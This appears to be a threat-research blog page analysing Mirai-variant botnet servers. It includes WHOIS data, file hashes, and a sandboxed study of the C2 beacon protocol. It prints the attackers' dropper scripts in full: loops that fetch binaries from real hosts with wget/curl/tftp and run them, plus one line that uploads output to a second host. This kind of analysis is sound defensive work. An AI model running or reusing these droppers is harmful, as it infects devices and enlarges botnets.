|
|
Analysis Tech Art Repositories | |||||||
Sat Sep 17 23:02:38 2022
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there's a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
library(ggplot2)
library(Rwhois)
library(Rrdap)
library(rgeolocate)
source("shared/country_code_cleanup.R")
source("shared/geoip.R")
source("shared/world_mapper.R")
185.28.38.119
your device just got infected to a bootnoot
inetnum: 185.28.38.0 - 185.28.38.127
netname: PROHOSTIE-INFRA-NL38
country: NL
admin-c: TECH12-RIPE
tech-c: TECH12-RIPE
status: LIR-PARTITIONED PA
mnt-by: TG32354-MNT
created: 2020-10-08T13:11:40Z
last-modified: 2020-10-08T13:11:40Z
source: RIPE
person: Timothy Gratton
address: Prohost Limited
address: Moonhill Cottage Drumnagah
address: V95 K2 N6 Inagh
address: Ireland
phone: + 353656715207
nic-hdl: TECH12-RIPE
mnt-by: TG32354-MNT
created: 2013-06-07T12:29:29Z
last-modified: 2018-05-29T16:20:28Z
source: RIPE # Filtered
$ curl -i http://185.28.39.119/
HTTP/1.1 200 OK
Date: Wed, 04 May 2022 02:03:21 GMT
Server: Apache/2.4.48 (Ubuntu)
Last-Modified: Mon, 25 Apr 2022 03:17:47 GMT
ETag: "2aa6-5dd72053d1a55"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
Default Ubuntu Welcome page for Apache.
$ sha256sum redacted/malware/185.28.39.119/*
4b0bb60b015ffea0472cbdc6913e5b6ae37bbc0a8c1d45eebab3e3f888d6e657 redacted/malware/185.28.39.119/miori.arm
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3 redacted/malware/185.28.39.119/miori.arm5
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3 redacted/malware/185.28.39.119/miori.arm6
d15dbe156eec5e349b1a636bb265cdbd559e2f4794f80e854f6081ddb39169bc redacted/malware/185.28.39.119/miori.arm7
ee7a78c2a86f1e69ee0e4db252a0667973e59ea9324453a119014019682d6b26 redacted/malware/185.28.39.119/miori.mips
6509b8454664bdd5f72bcf41a95db928850892dd039abf427bf6119336fbdaf3 redacted/malware/185.28.39.119/miori.mpsl
a6fe6bcd3b826f95f93cb8643f6436dcfcae95f3fb5fda611695a1156dc1af0e redacted/malware/185.28.39.119/miori.ppc
24f18dc607531367fb050c98874a210a02cdeeffb056799a15cccebcff4bc76c redacted/malware/185.28.39.119/miori.sh4
ad6b282ebdb377800098229b8a10c9c5bcad4eb065c8e40e92ce677379b4dac5 redacted/malware/185.28.39.119/miori.x86
f03d281504447f7a20d36406c6aad7dac59d0fc1a1222a7838aca1b70e9f8604 redacted/malware/185.28.39.119/sh
binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc"
server_ip="185.28.39.119"
binname="miori"
for arch in $binarys
do
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done
Inside the binaries:
your device just got infected to a bootnoot
inetnum: 37.0.8.0 - 37.0.11.255
netname: SERVER-37-0-8-0
country: NL
org: ORG-SB656-RIPE
admin-c: SBAH20-RIPE
tech-c: SBAH20-RIPE
status: ASSIGNED PA
mnt-by: PREFIXBROKER-MNT
created: 2021-03-04T10:30:18Z
last-modified: 2021-03-04T10:30:18Z
source: RIPE
organisation: ORG-SB656-RIPE
org-name: Serverion BV
org-type: OTHER
address: Krammer 8
address: 3232HE Brielle
address: Netherlands
abuse-c: SBAH20-RIPE
mnt-ref: PREFIXBROKER-MNT
mnt-by: PREFIXBROKER-MNT
created: 2021-03-04T10:30:18Z
last-modified: 2021-03-04T10:30:18Z
source: RIPE # Filtered
$ curl -i http://37.0.11.168
HTTP/1.1 200 OK
Date: Thu, 05 May 2022 17:53:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 16 Apr 2022 13:58:42 GMT
ETag: "2aa6-5dcc5ecc884dd"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
Default Ubuntu Welcome page for Apache again.
$ sha256sum redacted/malware/37.0.11.168/*
4b0bb60b015ffea0472cbdc6913e5b6ae37bbc0a8c1d45eebab3e3f888d6e657 redacted/malware/37.0.11.168/miori.arm
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3 redacted/malware/37.0.11.168/miori.arm5
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3 redacted/malware/37.0.11.168/miori.arm6
d15dbe156eec5e349b1a636bb265cdbd559e2f4794f80e854f6081ddb39169bc redacted/malware/37.0.11.168/miori.arm7
ee7a78c2a86f1e69ee0e4db252a0667973e59ea9324453a119014019682d6b26 redacted/malware/37.0.11.168/miori.mips
6509b8454664bdd5f72bcf41a95db928850892dd039abf427bf6119336fbdaf3 redacted/malware/37.0.11.168/miori.mpsl
a6fe6bcd3b826f95f93cb8643f6436dcfcae95f3fb5fda611695a1156dc1af0e redacted/malware/37.0.11.168/miori.ppc
24f18dc607531367fb050c98874a210a02cdeeffb056799a15cccebcff4bc76c redacted/malware/37.0.11.168/miori.sh4
ad6b282ebdb377800098229b8a10c9c5bcad4eb065c8e40e92ce677379b4dac5 redacted/malware/37.0.11.168/miori.x86
bdcb3fe159a00c19682c86463d35ddbf26d43597c340ae340ddb79a6e6b1ac2d redacted/malware/37.0.11.168/sh
Similar script to previous one:
binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc"
server_ip="37.0.11.168"
binname="miori"
for arch in $binarys
do
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done
your device just got infected to a bootnoot
inetnum: 179.43.128.0/18
status: allocated
aut-num: N/A
owner: PRIVATE LAYER INC
ownerid: PA-PLIN-LACNIC
responsible: Milciades Garcia
address: Torres De Las Americas, Torre C, 0, Suite 1404, Floor 14
address: 00000 - Panama -
country: PA
phone: +41 43 5082295
owner-c: MIG23
tech-c: MIG23
abuse-c: MIG23
inetrev: 179.43.128.0/24
nserver: DNS01.PRIVATELAYER.COM
nsstat: 20220527 AA
nslastaa: 20220527
nserver: DNS02.PRIVATELAYER.COM
nsstat: 20220527 AA
nslastaa: 20220527
inetrev: 179.43.129.0/24
$ curl -i http://179.43.156.214
HTTP/1.1 200 OK
Date: Fri, 27 May 2022 08:45:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 18 May 2022 06:34:52 GMT
ETag: "2aa6-5df4374695b6c"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
Default Ubuntu Welcome page for Apache again.
$ sha256sum redacted/malware/179.43.156.214/*
f39119f6193fb4c9b9ec44b805913c153b8f78bbf04c39b6cc71e62380f37f83 redacted/malware/179.43.156.214/c.sh
de3e8caee958dde0ef6c1fb1a60f1f39a59af77a436868e074537e9d9520adfb redacted/malware/179.43.156.214/miori.arc
2e633547fec21a3e50fc9ecdca4d1d444e109dae7d091392889437c518aff35f redacted/malware/179.43.156.214/miori.arm
8ae0fe14bdc98530ed82a564dadf0b93f38d3ab3b15fad3c6db602a29a0404a2 redacted/malware/179.43.156.214/miori.arm5
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491 redacted/malware/179.43.156.214/miori.arm6
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491 redacted/malware/179.43.156.214/miori.arm7
69e7fd2ca9ae406495256d602e08fba0fd2d84ff2da4247d0fc5ae229b63fe35 redacted/malware/179.43.156.214/miori.i5
819b5c3f6c5db4f3aa44da5361dd834639628cf8f423735937c856872cae9c5e redacted/malware/179.43.156.214/miori.i6
24e9f89bca2c8750ce05f4bc8bb27607528a60fc28aefc3ebe9e2cc97cb6abe0 redacted/malware/179.43.156.214/miori.m68k
16a97a7944c74fc0dda11f5593ec0f26661c8ec14d3ba08d1a950433aa68f16a redacted/malware/179.43.156.214/miori.mips
20088d86376536f8f3b3a2fa4ed7627a5f279328897f786c565c553170c9a805 redacted/malware/179.43.156.214/miori.mpsl
12809c91400833d71acd30c381a23cad340cbf51a3e92a1150c3b494d599efd2 redacted/malware/179.43.156.214/miori.ppc
b40a9f4a0f3f1a9647f4c8e9a2569c53d6bb76963d7c0cd7369a053e45c25d04 redacted/malware/179.43.156.214/miori.sh4
58220a864dcdb5d26d590c0ccdb37be044ac9abb4b592befa82660bd4464c474 redacted/malware/179.43.156.214/miori.spc
cf08da6870c9ae3b09cc45a3ba75d35fc89c772157c09131d97f8ba3b08e3562 redacted/malware/179.43.156.214/miori.x86
34c15160e0e684a7bb5f97957e482e36c9d1a7f5b23b27b89b0cdd710896e4fe redacted/malware/179.43.156.214/sh
8770abb8e430cfeeddf0df483b21b3f2ea6028cc8fd32da8e991dc27729589b8 redacted/malware/179.43.156.214/w.sh
curl http://46.19.137.50/sh; chmod 777 sh; ./sh android
rm $0
binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc i5 i6 m68k"
server_ip="179.43.156.214"
binname="miori"
for arch in $binarys
do
rm -rf $binname.$arch
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done
busybox wget http://46.19.137.50/sh; chmod 777 sh; ./sh android
rm $0
your device just got infected to a bootnoot
$ curl -i http://46.19.137.50
curl -i http://46.19.137.50
HTTP/1.1 200 OK
Date: Fri, 27 May 2022 08:46:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 4099
Content-Type: text/html;charset=UTF-8
Index of /
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════
[TXT] c.sh 2022-05-25 12:31 64
[DIR] gaybub/ 2022-05-25 12:33 -
[ ] miori.arc 2022-05-26 14:05 114K
[ ] miori.arm 2022-05-26 14:05 37K
[ ] miori.arm5 2022-05-26 14:05 37K
[ ] miori.arm6 2022-05-26 14:05 86K
[ ] miori.arm7 2022-05-26 14:05 86K
[ ] miori.i5 2022-05-26 14:05 30K
[ ] miori.i6 2022-05-26 14:05 31K
[ ] miori.m68k 2022-05-26 14:05 35K
[ ] miori.mips 2022-05-26 14:05 48K
[ ] miori.mpsl 2022-05-26 14:05 50K
[ ] miori.ppc 2022-05-26 14:05 33K
[ ] miori.sh4 2022-05-26 14:05 30K
[ ] miori.spc 2022-05-26 14:05 39K
[ ] miori.x86 2022-05-26 14:05 37K
[ ] sh 2022-05-25 12:08 399
[TXT] w.sh 2022-05-25 12:32 72
══════════════════════════════════════════════════
Apache/2.4.41 (Ubuntu) Server at 46.19.137.50 Port 80
Index of /gaybub
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[TXT] c.sh 2022-05-25 12:33 64
[ ] miori.arc 2022-05-26 14:05 114K
[ ] miori.arm 2022-05-26 14:05 37K
[ ] miori.arm5 2022-05-26 14:05 37K
[ ] miori.arm6 2022-05-26 14:05 86K
[ ] miori.arm7 2022-05-26 14:05 86K
[ ] miori.i5 2022-05-26 14:05 30K
[ ] miori.i6 2022-05-26 14:05 31K
[ ] miori.m68k 2022-05-26 14:05 35K
[ ] miori.mips 2022-05-26 14:05 48K
[ ] miori.mpsl 2022-05-26 14:05 50K
[ ] miori.ppc 2022-05-26 14:05 33K
[ ] miori.sh4 2022-05-26 14:05 30K
[ ] miori.spc 2022-05-26 14:05 39K
[ ] miori.x86 2022-05-26 14:05 37K
[ ] sh 2022-05-25 12:09 399
[TXT] w.sh 2022-05-25 12:33 72
══════════════════════════════════════════════════════════════
Apache/2.4.41 (Ubuntu) Server at 46.19.137.50 Port 80
$ sha256sum redacted/malware/46.19.137.50/*
de3e8caee958dde0ef6c1fb1a60f1f39a59af77a436868e074537e9d9520adfb redacted/malware/46.19.137.50/miori.arc
2e633547fec21a3e50fc9ecdca4d1d444e109dae7d091392889437c518aff35f redacted/malware/46.19.137.50/miori.arm
8ae0fe14bdc98530ed82a564dadf0b93f38d3ab3b15fad3c6db602a29a0404a2 redacted/malware/46.19.137.50/miori.arm5
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491 redacted/malware/46.19.137.50/miori.arm6
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491 redacted/malware/46.19.137.50/miori.arm7
69e7fd2ca9ae406495256d602e08fba0fd2d84ff2da4247d0fc5ae229b63fe35 redacted/malware/46.19.137.50/miori.i5
819b5c3f6c5db4f3aa44da5361dd834639628cf8f423735937c856872cae9c5e redacted/malware/46.19.137.50/miori.i6
24e9f89bca2c8750ce05f4bc8bb27607528a60fc28aefc3ebe9e2cc97cb6abe0 redacted/malware/46.19.137.50/miori.m68k
16a97a7944c74fc0dda11f5593ec0f26661c8ec14d3ba08d1a950433aa68f16a redacted/malware/46.19.137.50/miori.mips
20088d86376536f8f3b3a2fa4ed7627a5f279328897f786c565c553170c9a805 redacted/malware/46.19.137.50/miori.mpsl
12809c91400833d71acd30c381a23cad340cbf51a3e92a1150c3b494d599efd2 redacted/malware/46.19.137.50/miori.ppc
b40a9f4a0f3f1a9647f4c8e9a2569c53d6bb76963d7c0cd7369a053e45c25d04 redacted/malware/46.19.137.50/miori.sh4
58220a864dcdb5d26d590c0ccdb37be044ac9abb4b592befa82660bd4464c474 redacted/malware/46.19.137.50/miori.spc
cf08da6870c9ae3b09cc45a3ba75d35fc89c772157c09131d97f8ba3b08e3562 redacted/malware/46.19.137.50/miori.x86
f5d4d06f6ebdbeb26e7c6b274c1af7cf4fcf9f6d3cd2d7d08200593e1c632531 redacted/malware/46.19.137.50/sh
Seems to be the exact same code, except sh:
binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc i5 i6 m68k"
server_ip="46.19.137.50"
binname="miori"
for arch in $binarys
do
rm -rf $binname.$arch
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done
Just a different server_ip variable.
Infected By Cult
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
inetnum: 2.56.58.0 - 2.56.59.255
netname: SERVER-2-56-58-0
country: NL
org: ORG-SB666-RIPE
admin-c: SBAH21-RIPE
tech-c: SBAH21-RIPE
status: ASSIGNED PA
mnt-by: PREFIXBROKER-MNT
created: 2021-05-03T18:09:59Z
last-modified: 2021-05-03T18:09:59Z
source: RIPE
organisation: ORG-SB666-RIPE
org-name: Serverion BV
org-type: OTHER
address: Krammer 8
address: 3232HE Brielle
address: Netherlands
abuse-c: SBAH21-RIPE
mnt-ref: PREFIXBROKER-MNT
mnt-by: PREFIXBROKER-MNT
created: 2021-05-03T18:09:58Z
last-modified: 2021-05-03T18:09:58Z
source: RIPE # Filtered
$ curl -i http://2.56.59.196/
HTTP/1.1 200 OK
Date: Thu, 26 May 2022 17:32:24 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sat, 21 May 2022 02:27:59 GMT
ETag: "0-5df7c5b033771"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://2.56.59.196/bins/
HTTP/1.1 200 OK
Date: Thu, 26 May 2022 17:31:27 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3075
Content-Type: text/html;charset=ISO-8859-1
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] Saitama121.arm 2022-05-18 21:25 77K
[ ] Saitama121.arm5 2022-05-18 21:25 57K
[ ] Saitama121.arm6 2022-05-18 21:25 85K
[ ] Saitama121.arm7 2022-05-18 21:25 150K
[ ] Saitama121.m68k 2022-05-18 21:25 74K
[ ] Saitama121.mips 2022-05-18 21:25 95K
[ ] Saitama121.mpsl 2022-05-18 21:25 99K
[ ] Saitama121.ppc 2022-05-18 21:25 73K
[ ] Saitama121.sh4 2022-05-18 21:25 69K
[ ] Saitama121.spc 2022-05-18 21:25 78K
[ ] Saitama121.x86 2022-05-18 21:25 67K
══════════════════════════════════════════════════════════════
inetnum: 45.95.55.0 - 45.95.55.127
netname: DE-FLYHOSTING
country: DE
admin-c: TP7252-RIPE
org: ORG-FA1202-RIPE
tech-c: TP7252-RIPE
abuse-c: ACRO47362-RIPE
status: ASSIGNED PA
mnt-by: MNT-LUMASERV
created: 2022-03-27T17:10:19Z
last-modified: 2022-05-28T13:54:54Z
source: RIPE
organisation: ORG-FA1202-RIPE
org-name: Fly-Hosting
org-type: OTHER
address: Alte Heerstrasse 13
address: 38518 Gifhorn
abuse-c: ACRO47362-RIPE
mnt-ref: MNT-LUMASERV
mnt-by: MNT-LUMASERV
mnt-by: MNT-LUMASERV
created: 2022-05-28T13:54:34Z
last-modified: 2022-05-28T13:54:34Z
source: RIPE # Filtered
person: Timon Prilop
address: Alte Heerstrasse 13
address: 38518 Gifhorn
phone: +49000000000
nic-hdl: TP7252-RIPE
mnt-by: MNT-LUMASERV
mnt-by: MNT-LUMASERV
created: 2022-03-27T17:08:37Z
last-modified: 2022-03-27T17:08:37Z
source: RIPE
$ curl -i http://45.95.55.27/
HTTP/1.1 200 OK
Date: Sun, 05 Jun 2022 18:52:37 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 02 Jun 2022 17:59:45 GMT
ETag: "24c-5e07ac558643a"
Accept-Ranges: bytes
Content-Length: 588
Content-Type: text/html; charset=UTF-8
rm -rf a3; curl http://45.95.55.27/bins/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 45.95.55.50:9832 -T a;
rm -rf a2; curl http://45.95.55.27/bins/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 45.95.55.50:9832 -T b;
rm -rf a1; curl http://45.95.55.27/bins/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 45.95.55.50:9832 -T c;
rm -rf a6; curl http://45.95.55.27/bins/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 45.95.55.50:9832 -T d;
rm -rf a9; curl http://45.95.55.27/bins/mipsl > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 45.95.55.50:9832 -T e;
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arc 2022-06-05 11:22 49K
[ ] arm 2022-06-05 11:22 83K
[ ] arm5 2022-06-05 11:22 57K
[ ] arm6 2022-06-05 11:22 93K
[ ] arm7 2022-06-05 11:22 163K
[ ] m68k 2022-06-05 11:22 82K
[ ] mips 2022-06-05 11:22 74K
[ ] mpsl 2022-06-05 11:22 103K
[ ] ppc 2022-06-05 11:22 77K
[ ] sh4 2022-06-05 11:22 73K
[ ] spc 2022-06-05 11:22 84K
[ ] x86 2022-06-05 11:22 73K
══════════════════════════════════════════════════════════════
wget -U "%s" %s -q --spider
POST /cdn-cgi/
HTTP/1.1
User-Agent:
Host:
Cookie:
http
url=
POST
HAIL
THE WGET FLOOD
cats on top <3 nya~!
The initial connection attempts on infection are just to blast various ports on port 23 and 2323, but there's one 55566 that sticks out which turns out is the beacon server.
The strategy here is to have a contained, non-internet connected VM infected and firewalled where I can monitor the outgoing connection attempts, simulate the server internally, and then manually attempt those connections on the real server.
The firewall hits that were contained can be analyzed through digging with grep and converting to CSV. The collection is specific to my environment, but basically it's just IPTables with a “–log-prefix” of “DROP-CONTAINED-XX.YY: ” that has some IP information, then there is a DROP rule immediately after for it. This is through libvirt/qemu-kvm.
Searching the logs for connection attempts, sorting gives the highest connection point and results in an easy standout IP/port:
$ cat contained_miori.txt | sed -r "s/^.*DST=([^ ]+) .* DPT=([^ ]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail
2 8.253.72.172:23
2 83.101.19.29:23
2 85.20.215.115:23
2 8.77.93.33:23
2 92.167.182.16:23
2 96.49.223.169:23
2 97.174.66.213:23
2 98.123.59.18:23
3 231.143.205.226:23
75 46.19.137.50:55566
(REMOTE BEACON)
05:58 -!- Irssi: Looking up 46.19.137.50
05:58 -!- Irssi: Connecting to 46.19.137.50 [46.19.137.50] port 55566
05:58 -!- Irssi: Connection to 46.19.137.50 established
05:58 -!- [?1049h��A����"ユーザー名: NICK mfu7454
05:58 -!- パスワード: *****************************************
05:58 -!- Mチェックイン情報... -Mチェックイン情報... \Mチェックイン情報...
|Mチェックイン情報... /Mチェックイン情報... -Mチェックイン情報...
\Mチェックイン情報... |Mチェックイン情報... /Mチェックイン情報...
-Mチェックイン情報... \Mチェックイン情報... |Mチェックイン情報...
/Mチェックイン情報... -Mチェックイン情報... \Mチェックイン情報... |M[-]INVALAD
LOGIN[-]
IRC connection tcpdump'd:
# tcpdump -s 0 -i any -w miori.dump tcp port 55566
(REMOTE BEACON)
CAP LS
NICK mfu7454
USER mfu1243 mfu1243 46.19.137.50 :mfu729
.[?1049h........".[1;35m....[1;37m....[1;35m....[1;37m....[1;35m....[1;36m: .[0mNICK mfu7454
.[1;35m....[1;37m....[1;35m....[1;37m....[1;35m....[1;36m: .[0m*****************************************
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[37;1m........................... .[31m/
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[37;1m........................... .[31m/
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[37;1m........................... .[31m/
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[1;37m[-]INVALAD LOGIN[-]
.[1;37m[-]press any key to exit[-].[0m.[?1049l
Notice all of the terminal color codes (IE: “.[37;1m”, etc). This shows up as purple and blue and a few other colors when interpreted on a Linux ptty. Not IRC, yet again got the wrong protocol, oops.
Routing the specific traffic I need to localhost running a listening logging netcat server.
(CONTAINED VM)
# iptables -t nat -A OUTPUT -d 46.19.137.50 -j DNAT --to-destination 127.0.0.1
# nc -l -p 55566 -o hexout.txt
Header of the malware client that sends to the remote server.
(CONTAINED VM)
< 00000000 03 00 02 01 00 # .....
< 00000005 00 00 # ..
< 00000007 00 00 # ..
< 00000009 00 00 # ..
< 0000000b 00 00 # ..
< 0000000d 00 00 # ..
< 0000000f 00 00 # ..
Each of the two null characters were outputting once every minute. Using this, I put some of this data into the client.py and server.py pseudo clients I have at the bottom of this page. This is kind of being used as a disjoint middle-man low(ish) socket-server.
Output from beacon server from python client.py:
(REMOTE BEACON)
SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[1;37m[-]INVALAD LOGIN[-]\r\n\x1b[1;37m[-]press any key to exit[-]\x1b[0m', None)
SEND PING: b'\x00\x00'
Text representation:
(REMOTE BEACON)
������"ユーザー名:
パスワード:
[-]INVALAD LOGIN[-] |
[-]press any key to exit[-]%
So, no dice. After passing this back to the client, I noticed the malware actually passes a single \x00 initially, not a double. I wonder if this will change things…
(REMOTE BEACON)
SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND DATA: b'\x00'
RESPONSE: (b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|', None)
SEND PING: b'\x00\x00'
